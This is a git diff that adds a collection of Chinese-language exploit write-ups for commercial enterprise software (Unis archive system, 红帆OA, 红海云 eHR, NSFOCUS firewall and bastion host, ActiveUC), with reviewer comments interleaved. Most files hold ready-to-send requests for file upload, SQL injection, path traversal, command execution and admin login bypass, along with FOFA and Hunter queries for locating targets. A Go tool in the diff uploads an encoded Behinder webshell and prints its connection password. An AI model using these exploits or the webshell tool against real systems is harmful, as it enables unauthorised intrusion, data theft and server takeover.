@@ -0,0 +1,70 @@ +# 紫光档案管理系统WorkFlow存在任意文件上传漏洞 + +# 一、漏洞简介 +紫光电子档案管理系统是一款专业的电子档案管理软件,旨在帮助企业实现高效、便捷的档案管理。系统具有强大的文件存储、检索和共享功能,能够提供全面的档案管理解决方案。同时,紫光电子档案管理系统还拥有智能化的分类和归档功能,可以自动识别文件类型和属性,实现快速分类和高效管理。用户只需简单操作,就能轻松实现对各类电子档案的整理、查询和备份,极大提升了工作效率和信息安全性。紫光档案管理系统WorkFlow存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 紫光档案管理系统 + +# 三、资产测绘 ++ hunter`app.name="紫光档案管理系统"` ++ 特征 + +![1706701328959-e1863eab-b7f1-4486-80c8-0a22052ee093.png](./img/XBNrpIgiaD34ynSQ/1706701328959-e1863eab-b7f1-4486-80c8-0a22052ee093-481346.png) + +# 四、漏洞复现 +```plain +POST /System/WorkFlow/upload.html?token=5117e82385cef4c12547fdd4c028b97a1-1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Connection: close +Content-Length: 566 +Accept: */* +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=vow8ojiofbpypwih3t3i + +--vow8ojiofbpypwih3t3i +Content-Disposition: form-data; name="userID" + +admin +--vow8ojiofbpypwih3t3i +Content-Disposition: form-data; name="fondsid" + +1 +--vow8ojiofbpypwih3t3i +Content-Disposition: form-data; name="comid" + +1 +--vow8ojiofbpypwih3t3i +Content-Disposition: form-data; name="token" + +affe447f075bac53a7e568e833391e67 +--vow8ojiofbpypwih3t3i +Content-Disposition: form-data; name="Filedata"; filename="wizjbifuta.php" +Content-Type: multipart/form-data + + + +--vow8ojiofbpypwih3t3i-- +``` + +![1708400624091-0445193c-2775-46e8-941b-14504eb04eca.png](./img/XBNrpIgiaD34ynSQ/1708400624091-0445193c-2775-46e8-941b-14504eb04eca-391445.png) + +上传文件位置 + +```plain +GET /tmp/System/WorkFlow/import/20240220/65d41fbc77b27.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 +Connection: close +Accept: text/* +Cookie: PHPSESSID=d3dbba517d0d6ff544f1be11e134a7f9 +Accept-Encoding: gzip, deflate +``` + 
+![1708400691415-3428fb4b-98d4-43ce-ae07-f9b7a0edae2e.png](./img/XBNrpIgiaD34ynSQ/1708400691415-3428fb4b-98d4-43ce-ae07-f9b7a0edae2e-480631.png) + + + +> 更新: 2024-02-29 23:55:41 +> 原文: \ No newline at end of file diff --git a/紫光档案管理系统editPass存在SQL注入漏洞.md b/紫光档案管理系统editPass存在SQL注入漏洞.md new file mode 100644 index 0000000..79f1648 --- /dev/null +++ b/紫光档案管理系统editPass存在SQL注入漏洞.md @@ -0,0 +1,25 @@ +# 紫光档案管理系统editPass存在SQL注入漏洞 + +# 一、漏洞简介 +紫光电子档案管理系统是一款专业的电子档案管理软件,旨在帮助企业实现高效、便捷的档案管理。系统具有强大的文件存储、检索和共享功能,能够提供全面的档案管理解决方案。同时,紫光电子档案管理系统还拥有智能化的分类和归档功能,可以自动识别文件类型和属性,实现快速分类和高效管理。用户只需简单操作,就能轻松实现对各类电子档案的整理、查询和备份,极大提升了工作效率和信息安全性。紫光档案管理系统editPass存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 紫光档案管理系统 + +# 三、资产测绘 ++ hunter`app.name="紫光档案管理系统"` ++ 特征 + +![1706701328959-e1863eab-b7f1-4486-80c8-0a22052ee093.png](./img/j5f7yjDb2Np2A0LL/1706701328959-e1863eab-b7f1-4486-80c8-0a22052ee093-198835.png) + +# 四、漏洞复现 +```plain +/login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1))) +``` + +![1706702958468-3b2d1939-8759-471a-b80c-468e348230f1.png](./img/j5f7yjDb2Np2A0LL/1706702958468-3b2d1939-8759-471a-b80c-468e348230f1-888044.png) + + + +> 更新: 2024-02-29 23:55:41 +> 原文: \ No newline at end of file diff --git a/紫光档案管理系统mergeFile存在SQL注入漏洞.md b/紫光档案管理系统mergeFile存在SQL注入漏洞.md new file mode 100644 index 0000000..2cd9df9 --- /dev/null +++ b/紫光档案管理系统mergeFile存在SQL注入漏洞.md 
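Review bot: in the WorkFlow upload file, the `Filedata` part is empty and its part header reads `Content-Type: multipart/form-data`, which is not a file part type, so `Content-Length: 566` appears to have been computed for a body whose file content is now missing; the request as committed is not reproducible. Two different tokens are used (`?token=5117e82385cef4c12547fdd4c028b97a1-1` in the URL, `affe447f075bac53a7e568e833391e67` in the form) with no word on where either is obtained, and the follow-up `GET /tmp/System/WorkFlow/import/20240220/65d41fbc77b27.php` uses a server-generated name without saying where that name is returned. Document all three.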
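Review bot: in the editPass file, the 简介 is four sentences of vendor copy followed by the title restated; say that `comid` in `/login/Login/editPass.html` is the injection point and what the `extractvalue(1,concat(char(126),md5(1)))` probe returns on a vulnerable host (an XPATH error containing the hash), so the reader has a match condition. `> 原文:` is empty and `影响版本` carries no version range.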
@@ -0,0 +1,26 @@ +# 紫光档案管理系统mergeFile存在SQL注入漏洞 +紫光电子档案管理系统是一款专业的电子档案管理软件,旨在帮助企业实现高效、便捷的档案管理。系统具有强大的文件存储、检索和共享功能,能够提供全面的档案管理解决方案。同时,紫光电子档案管理系统还拥有智能化的分类和归档功能,可以自动识别文件类型和属性,实现快速分类和高效管理。用户只需简单操作,就能轻松实现对各类电子档案的整理、查询和备份,极大提升了工作效率和信息安全性。紫光档案管理系统mergeFile存在SQL注入漏洞 + +## fofa +```javascript +app="紫光-档案管理系统" && body="www.unissoft.com" +``` + +## poc +```java +POST /Archive/ErecordManage/mergeFile HTTP/1.1 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: close +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36 + +userID=admin&fondsid=1&comid=1' +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731327037075-c9e88b13-b658-4e7e-b7ad-a6c7d12dca30.png) + diff --git a/紫光电子档案管理系统selectFileRemote存在SQL注入漏洞.md b/紫光电子档案管理系统selectFileRemote存在SQL注入漏洞.md new file mode 100644 index 0000000..f96226d --- /dev/null +++ b/紫光电子档案管理系统selectFileRemote存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +# 紫光电子档案管理系统selectFileRemote存在SQL注入漏洞 + +紫光电子档案管理系统selectFileRemote存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript +body="www.unissoft.com" +``` + +## poc + +```javascript +POST /Archive/ErecordManage/selectFileRemote HTTP/1.1 +Host: {{Hostname}} +Accept: */* Accept-Encoding: gzip, deflate +Connection: close +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +userID=admin&fondsid=1&comid=1' +``` + diff --git a/红帆OA iorepsavexml.aspx 文件上传漏洞.md b/红帆OA iorepsavexml.aspx 文件上传漏洞.md index fdaa557..9190bf0 100644 --- a/红帆OA iorepsavexml.aspx 文件上传漏洞.md +++ b/红帆OA iorepsavexml.aspx 文件上传漏洞.md 
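Review bot: in the mergeFile file, the 简介 ends with the title repeated and there is no success indicator; `userID=admin&fondsid=1&comid=1'` is a bare quote probe, so say which error or timing difference is expected. The HTTP request is fenced with the `java` tag and the FOFA query with `javascript`; no version is given.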
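Review bot: in the selectFileRemote file, `Accept: */* Accept-Encoding: gzip, deflate` puts two headers on one line, which is a malformed header that servers and proxies will reject or misparse; split it. The rest mirrors the mergeFile file (same `userID=admin&fondsid=1&comid=1'` body), so the two should cross-reference each other; the request is fenced with the `javascript` tag.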
@@ -1,7 +1,14 @@ ## 红帆OA iorepsavexml.aspx 文件上传漏洞 +## fofa + +``` +app="红帆-ioffice" +``` + ## exp + ```go package main diff --git a/红帆OA zyy_AttFile.asmx SQL注入漏洞.md b/红帆OA zyy_AttFile.asmx SQL注入漏洞.md index f20434c..f7dbe57 100644 --- a/红帆OA zyy_AttFile.asmx SQL注入漏洞.md +++ b/红帆OA zyy_AttFile.asmx SQL注入漏洞.md @@ -9,8 +9,6 @@ app="红帆-ioffice" ``` POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1 Host: 10.250.250.5 -User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, -like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 383 Content-Type: text/xml; charset=utf-8 Soapaction: "http://tempuri.org/GetFileAtt" diff --git a/红帆OA-iorepsavexml.aspx-文件上传漏洞.md b/红帆OA-iorepsavexml.aspx-文件上传漏洞.md new file mode 100644 index 0000000..fdaa557 --- /dev/null +++ b/红帆OA-iorepsavexml.aspx-文件上传漏洞.md 
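Review bot: adding the `## fofa` section to `红帆OA iorepsavexml.aspx 文件上传漏洞.md` is right, but the same patch later creates `红帆OA-iorepsavexml.aspx-文件上传漏洞.md` from blob `fdaa557`, the exact pre-change content of this file, so after the commit the repository holds two copies and the hyphenated one lacks this section. Rename with `git mv` (or delete one copy) instead of keeping both.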
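Review bot: in the zyy_AttFile hunk, dropping the wrapped `User-Agent` header is correct, since the `like Gecko) Version/12.0.3 ...` continuation line was a malformed header, but `Content-Length: 383` is kept while nothing else in the visible context changes, so confirm it still matches the body. The same broken two-line header is reintroduced verbatim in the new `红帆OA-zyy_AttFile.asmx-SQL注入漏洞.md` later in this patch.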
@@ -0,0 +1,128 @@ + +## 红帆OA iorepsavexml.aspx 文件上传漏洞 + +## exp +```go +package main + +import ( + "crypto/tls" + "fmt" + "github.com/hpifu/go-kit/hflag" + "github.com/imroc/req/v3" + "github.com/liushuochen/gotable" + "github.com/thanhpk/randstr" + "log" + "net/http" + "os" + "strings" + "time" +) + +func main() { + now := time.Now() + param := getParam() + uploader(param) + fmt.Printf("[√] 速度还是挺快的就这么点时间%s就GetShell了.", time.Since(now).String()) +} + +func getParam() string { + hflag.AddFlag("target", "海翔地址", hflag.Required(), hflag.Shorthand("t")) + if err := hflag.Parse(); err != nil { + fmt.Println(hflag.Usage()) + os.Exit(0) + } + return hflag.GetString("target") +} + +func reqClient() *req.Client { + cli := req.C() + cli.SetAutoDecodeAllContentType() + cli.SetRedirectPolicy(req.NoRedirectPolicy()) + cli.SetTimeout(time.Second * 15) + cli.SetTLSFingerprintSafari() + cli.TLSClientConfig = &tls.Config{InsecureSkipVerify: true, + MinVersion: tls.VersionTLS10, + MaxVersion: tls.VersionTLS13} + return cli +} + +func uploader(target string) { + shellName := randstr.Hex(8) + ".asp" + shellString := "<%\nResponse.CharSet = \"UTF-8\" \nk=\"e45e329feb5d925b\" \nSession(\"k\")=k\nsize=Request.TotalBytes\ncontent=Request.BinaryRead(size)\nFor i=1 To size\nresult=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))\nNext\nexecute(result)\n%>\n" + vulUrl := strings.Replace(target+"/ioffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename="+shellName+"&filepath=/upfiles/rep/pic/", "//io", "/io", 1) + client := reqClient() + post, err := client.R().SetBody(shellString).Post(vulUrl) + if err != nil { + log.Println(err) + return + } + defer func() { + _ = post.Body.Close() + }() + if post.StatusCode != http.StatusOK { + fmt.Println("GetShell Failed") + return + } + shellURL := strings.Replace(target+"/ioffice/upfiles/rep/pic/"+shellName, "//io", "/io", 1) + get, _ := client.R().Get(shellURL) + if get.StatusCode != http.StatusNotFound { + create, _ := 
gotable.Create("Shell连接工具", "Shell连接地址", "Shell连接密码") + _ = create.AddRow([]string{ + "冰蝎", shellURL, "rebeyond", + }) + fmt.Println(create) + } + defer func() { + _ = get.Body.Close() + }() +} + +``` + +![image](https://github.com/wy876/POC/assets/139549762/39e2c87c-080f-42f6-a7a2-5f79fc6d9204) + +## yaml poc +``` + +id: hongfanOA-iorepsavexml-aspx-GetShell + +info: + name: 红帆OA iorepsavexml.aspx 文件上传漏洞 + author: kyo + severity: critical + description: | + 红帆OA在上传时可被绕过上传的限制 + reference: + - + metadata: + verified: true + max-request: 2 + fofa-query: title="iOffice.net" + tags: hongfan,oa,upload + +http: + - raw: + - | + POST /ioffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename=qaxnb.txt&filepath=/upfiles/rep/pic/ HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + Content-Type: application/x-www-form-urlencoded + Content-Length: 0 + + qaxnb + - | + GET /ioffice/upfiles/rep/pic/qaxnb.txt HTTP/1.1 + Host: {{Hostname}} + + + matchers: + - type: dsl + dsl: + - 'status_code_1==200 && status_code_2 == 200' + - 'contains(body_2, "qaxnb")' + condition: and + +# digest: 4b0a00483046022100ace369b495c3c20753d111b9951b654c66682b38ecb89775c65cb0e9b23dd21d022100a9a3b446556750d6ecd73dff1605d01a1c60728720f4ee0c54654b1dcbd4c5d8:922c64590222798bb761d5b6d8e72951 +``` + diff --git a/红帆OA-zyy_AttFile.asmx-SQL注入漏洞.md b/红帆OA-zyy_AttFile.asmx-SQL注入漏洞.md new file mode 100644 index 0000000..f20434c --- /dev/null +++ b/红帆OA-zyy_AttFile.asmx-SQL注入漏洞.md 
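Review bot: in the Go tool, `get, _ := client.R().Get(shellURL)` discards the error and then reads `get.StatusCode`; when the request fails there is no HTTP response to read and the program panics, so check the error before using the response (likewise `create, _ := gotable.Create(...)`). The flag help text `海翔地址` names a different product than the 红帆OA tool it belongs to, and the final `fmt.Printf("[√] ...GetShell了.")` has no trailing newline. In the nuclei template, `Content-Length: 0` contradicts the 5-byte body `qaxnb` and should be removed, `reference:` has an empty `-` item, `fofa-query: title="iOffice.net"` disagrees with the `app="红帆-ioffice"` query used in this patch's other 红帆 files, and the trailing `# digest:` line is a signature over the template text that will not verify unless it was produced for exactly this copy.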
@@ -0,0 +1,26 @@ +## 红帆OA zyy_AttFile.asmx SQL注入漏洞 + +## fofa +``` +app="红帆-ioffice" +``` + +## poc +``` +POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1 +Host: 10.250.250.5 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, +like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Length: 383 +Content-Type: text/xml; charset=utf-8 +Soapaction: "http://tempuri.org/GetFileAtt" +Accept-Encoding: gzip, deflate +Connection: close + +1231=user_name() +``` diff --git a/红海云eHR系统pc.mob存在sql注入漏洞.md b/红海云eHR系统pc.mob存在sql注入漏洞.md new file mode 100644 index 0000000..3115dcc --- /dev/null +++ b/红海云eHR系统pc.mob存在sql注入漏洞.md @@ -0,0 +1,19 @@ +# 红海云eHR系统pc.mob存在sql注入漏洞 + +红海云eHR系统pc.mob存在sql注入漏洞 + +## fofa + +```yaml +body="/RedseaPlatform/skins/images/favicon.ico" +``` + +## poc + +```java +GET /RedseaPlatform/goApp/pc.mob?id=1%27%20AND%20(SELECT%204802%20FROM%20(SELECT(SLEEP(5)))ndMq)%20AND%20%27NEoX%27=%27NEoX HTTP/1.1 +Host: {{Hostname}} +Cookie: JSESSIONID=905D36CF9349B41FBFB0203D2BAA8CCC +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 +``` + diff --git a/绿盟-NF-下一代防火墙-任意文件上传漏洞.md b/绿盟-NF-下一代防火墙-任意文件上传漏洞.md new file mode 100644 index 0000000..7dad7d0 --- /dev/null +++ b/绿盟-NF-下一代防火墙-任意文件上传漏洞.md @@ -0,0 +1,15 @@ +## 绿盟 NF 下一代防火墙 任意文件上传漏洞 +``` +POST /api/v1/device/bugsInfo HTTP/1.1 +Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef +Host: +--4803b59d015026999b45993b1245f0ef +Content-Disposition: form-data; name="file"; filename="compose.php" + +--4803b59d015026999b45993b1245f0ef-- +POST /mail/include/header_main.php HTTP/1.1 +Content-Type: application/x-www-form-urlencoded +Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71 +Host: +cmd=phpinfo(); +``` diff --git a/绿盟SAS堡垒机Exec远程命令执行漏洞.md b/绿盟SAS堡垒机Exec远程命令执行漏洞.md new file mode 100644 index 0000000..bddff51 --- /dev/null +++ b/绿盟SAS堡垒机Exec远程命令执行漏洞.md 
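Review bot: in the hyphenated zyy_AttFile file, the `User-Agent` header is split across two lines (`(KHTML,` / `like Gecko) Version/12.0.3 ...`), which is a malformed header, and the body is reduced to `1231=user_name()`: the SOAP envelope for `GetFileAtt` that `Content-Length: 383` was computed for is gone, so the POC is not reproducible from this file. This is also the pre-fix copy of `红帆OA zyy_AttFile.asmx SQL注入漏洞.md`, which the same patch edits.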
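Review bot: in the 红海云 pc.mob file, the 简介 just repeats the title; say what the `id` parameter is and that the probe is time-based (`SLEEP(5)`, so the indicator is a roughly five-second delay). `Cookie: JSESSIONID=905D36CF9349B41FBFB0203D2BAA8CCC` should be a placeholder, or dropped if no session is needed; the request is fenced with the `java` tag and no version is given.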
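Review bot: in the 绿盟 NF file, two HTTP requests are packed into one fence with no separation: there is no blank line between the first request's `Host:` header and its multipart body, the uploaded `compose.php` part is empty, and `cmd=phpinfo();` follows the second request's `Host:` with no blank line, so neither request parses as shown. Split them into two fences, restore the blank lines, explain how the second request reaches the uploaded file (the `/mail/include/header_main.php` path and the `PHPSESSID_NF` cookie are unexplained), and add a version and source.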
@@ -0,0 +1,35 @@ +# 绿盟 SAS堡垒机 Exec 远程命令执行漏洞 + +# 一、漏洞执行 +绿盟 SAS堡垒机 Exec 远程命令执行漏洞,攻击者可通过该漏洞获取服务器控制权限。 + +# 二、影响版本 ++ 绿盟SAS堡垒机 + +# 三、资产测绘 ++ hunter`app.name="NSFOCUS 绿盟 SAS"` + +![1692345776559-f5624e5a-4bb4-49a1-891a-79dd9dc6ddce.png](./img/mv6562pcTMScguT0/1692345776559-f5624e5a-4bb4-49a1-891a-79dd9dc6ddce-397151.png) + ++ 登录页面 + +![1692345819090-b23ee8fd-4a29-497b-a62a-e7957b5cfd88.png](./img/mv6562pcTMScguT0/1692345819090-b23ee8fd-4a29-497b-a62a-e7957b5cfd88-049882.png) + +# 四、漏洞复现 +```plain +GET /webconf/Exec/index?cmd=wget%200nicnk.dnslog.cn HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Connection: close +``` + +![1699631390274-e13e84c5-8436-4db2-ac80-05982c2a23f9.png](./img/mv6562pcTMScguT0/1699631390274-e13e84c5-8436-4db2-ac80-05982c2a23f9-483338.png) + +![1699631405537-551fadb6-953b-4d16-af40-dbafadbb5587.png](./img/mv6562pcTMScguT0/1699631405537-551fadb6-953b-4d16-af40-dbafadbb5587-876996.png) + + + +> 更新: 2024-02-29 23:57:15 +> 原文: \ No newline at end of file diff --git a/绿盟SAS堡垒机GetFile任意文件读取漏洞.md b/绿盟SAS堡垒机GetFile任意文件读取漏洞.md new file mode 100644 index 0000000..85287ca --- /dev/null +++ b/绿盟SAS堡垒机GetFile任意文件读取漏洞.md 
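Review bot: the heading `# 一、漏洞执行` breaks the `一、漏洞简介` convention used by every other file in this patch, and the paragraph under it only repeats the title. The POC hard-codes `0nicnk.dnslog.cn`, a short-lived per-user subdomain; use a placeholder and state that the success indicator is the DNS/HTTP callback, since the response itself shows nothing. `影响版本` has no version range.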
@@ -0,0 +1,41 @@ +# 绿盟SAS堡垒机GetFile任意文件读取漏洞 + +# 一、漏洞简介 +绿盟堡垒机后台存在任意文件读取漏洞,攻击者可通过/webconf/GetFile 接口进行任意文件读取。 + +# 二、影响版本 ++ 绿盟SAS堡垒机 + +# 三、资产测绘 ++ hunter`app.name="NSFOCUS 绿盟 SAS"` + +![1692345776559-f5624e5a-4bb4-49a1-891a-79dd9dc6ddce.png](./img/VzHdqx2ESnEuSNwR/1692345776559-f5624e5a-4bb4-49a1-891a-79dd9dc6ddce-471038.png) + ++ 登录页面 + +![1692345819090-b23ee8fd-4a29-497b-a62a-e7957b5cfd88.png](./img/VzHdqx2ESnEuSNwR/1692345819090-b23ee8fd-4a29-497b-a62a-e7957b5cfd88-820589.png) + +# 四、漏洞复现 +```plain +GET /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: PHPSESSID=4d44c08bdf4492b7877f79ffa7122d3c +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1692346816258-20ff0e28-140a-4e23-b0f2-76a904fd5c4d.png](./img/VzHdqx2ESnEuSNwR/1692346816258-20ff0e28-140a-4e23-b0f2-76a904fd5c4d-833447.png) + + + +> 更新: 2024-02-29 23:57:15 +> 原文: \ No newline at end of file diff --git a/绿盟SAS堡垒机local_user.php任意用户登录漏洞.md b/绿盟SAS堡垒机local_user.php任意用户登录漏洞.md new file mode 100644 index 0000000..8d0e2ea --- /dev/null +++ b/绿盟SAS堡垒机local_user.php任意用户登录漏洞.md 
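Review bot: the 简介 places the flaw in the `后台` and the request carries `Cookie: PHPSESSID=4d44c08bdf4492b7877f79ffa7122d3c`, but the file never says whether a logged-in session is required; pre- versus post-auth file read decides severity and must be explicit. The `/etc/passwd` target is fine as a harmless indicator; `影响版本` again lists no version.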
@@ -0,0 +1,51 @@ +# 绿盟SAS堡垒机local_user.php任意用户登录漏洞 + +# 一、漏洞简介 +绿盟堡垒机存在任意用户登录漏洞,攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录。 + +# 二、影响版本 ++ 绿盟SAS堡垒机 + +## 三、资产测绘 ++ hunter`app.name="NSFOCUS 绿盟 SAS"` + +![1692345776559-f5624e5a-4bb4-49a1-891a-79dd9dc6ddce.png](./img/w4hwzlZLp5D37wYG/1692345776559-f5624e5a-4bb4-49a1-891a-79dd9dc6ddce-152262.png) + ++ 登录页面 + +![1692345819090-b23ee8fd-4a29-497b-a62a-e7957b5cfd88.png](./img/w4hwzlZLp5D37wYG/1692345819090-b23ee8fd-4a29-497b-a62a-e7957b5cfd88-428175.png) + +# 四、漏洞复现 +poc访问出现如下页面即可能存在漏洞 + +```plain +GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: PHPSESSID=03eea4323452c328c6462f1bb50a0a9b; Hm_lvt_2743f882f7de0bd7d8ffc885a04c90f5=1692345507; Hm_lpvt_2743f882f7de0bd7d8ffc885a04c90f5=1692345507; left_menustatue_NSFOCUSnbspSASH=0|0|https://yzyx.loogear.com/home/status +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1692345978621-ec4e3a8b-10e7-4f9f-83b4-4dd2ae4922f3.png](./img/w4hwzlZLp5D37wYG/1692345978621-ec4e3a8b-10e7-4f9f-83b4-4dd2ae4922f3-330623.png) + +然后直接访问堡垒机域名即可计入后台 + +```plain +http://xx.xx.xx.xx +``` + +![1692346036852-fabd8787-4603-474b-894e-25a08c3f8394.png](./img/w4hwzlZLp5D37wYG/1692346036852-fabd8787-4603-474b-894e-25a08c3f8394-661387.png) + + + +> 更新: 2024-02-29 23:57:15 +> 原文: \ No newline at end of file 
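Review bot: the Cookie header leaks the author's test environment: `left_menustatue_NSFOCUSnbspSASH=0|0|https://yzyx.loogear.com/home/status` names a real third-party host, and the `Hm_lvt_`/`Hm_lpvt_` analytics cookies are irrelevant; scrub them to placeholders before publishing. `## 三、资产测绘` uses `##` where its siblings use `#`, and `即可计入后台` should read `进入后台`. The 简介 should also say that the `cat=` parameter includes `local_user.php` with `method=login&user_account=admin`, since that request shape is the detection signature.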
diff --git a/网动统一通信平台(ActiveUC)接口iactiveEnterMeeting存在信息泄露漏洞.md b/网动统一通信平台(ActiveUC)接口iactiveEnterMeeting存在信息泄露漏洞.md new file mode 100644 index 0000000..bafcf33 --- /dev/null +++ b/网动统一通信平台(ActiveUC)接口iactiveEnterMeeting存在信息泄露漏洞.md @@ -0,0 +1,25 @@ +## 网动统一通信平台(ActiveUC)接口iactiveEnterMeeting存在信息泄露漏洞 + +网动统一通信平台是采用统一的通信界面,将VoIP电话系统、电子邮件等多种沟通方式融合的企业IT平台,接口 `/acenter/iactiveEnterMeeting.action?roomid=1&username=admin` 存在信息泄露漏洞,可能导致管理员密码泄露获取后台权限等。 + +## hunter + +```javascript +web.title=="网动统一通信平台(Active UC)" +``` + + +## poc +```javascript +GET /acenter/iactiveEnterMeeting.action?roomid=1&username=admin HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: keep-alive +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +``` + +![image-20241014095902804](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410140959976.png) diff --git a/网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞.md b/网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞.md new file mode 100644 index 0000000..bd0273d --- /dev/null +++ b/网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞.md 
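Review bot: the 简介 claims the response 可能导致管理员密码泄露 but the file shows no field name or redacted sample, so a reader cannot distinguish a vulnerable response from a normal one; quote the relevant key. The identical `GET /acenter/iactiveEnterMeeting.action?roomid=1&username=admin` is documented again as `网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞.md` in the next file of this patch; consolidate or cross-link. The Hunter query and the request are fenced with the `javascript` tag.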
@@ -0,0 +1,33 @@ +# 网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞 + +# 一、漏洞简介 + 网动统一通信平台是一个涵盖了多种通信功能的综合平台,通常包括文字、语音、视频通讯等功能,并且可能提供了一系列的通讯工具和服务。这样的平台通常旨在提升用户的沟通效率和便利性,为用户提供一个统一的通信环境。网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞 + +# 二、影响版本 ++ 网动统一通信平台 + +# 三、资产测绘 ++ fofa`title="网动统一通信平台(Active UC)"` ++ 特征 + +![1715181346183-38fe9fce-95da-4fcc-9444-e758323b5b48.png](./img/bchEO-h-HB8Wt1xO/1715181346183-38fe9fce-95da-4fcc-9444-e758323b5b48-583994.png) + +--- + +# 四、漏洞复现 +```http +GET /acenter/iactiveEnterMeeting.action?roomid=1&username=admin HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +``` + +![1728895972113-cd2610be-9b1a-425a-a4c5-db5f41756e26.png](./img/bchEO-h-HB8Wt1xO/1728895972113-cd2610be-9b1a-425a-a4c5-db5f41756e26-783469.png) + +解密后可登录系统 + +![1728896161193-80cbf6bb-9a72-40fa-90e6-0b901c7ad4d7.png](./img/bchEO-h-HB8Wt1xO/1728896161193-80cbf6bb-9a72-40fa-90e6-0b901c7ad4d7-462992.png) + + + +> 更新: 2024-10-22 09:40:55 +> 原文: \ No newline at end of file diff --git a/网动统一通信平台meetingShow存在任意文件读取漏洞.md b/网动统一通信平台meetingShow存在任意文件读取漏洞.md new file mode 100644 index 0000000..a292cb1 --- /dev/null +++ b/网动统一通信平台meetingShow存在任意文件读取漏洞.md 
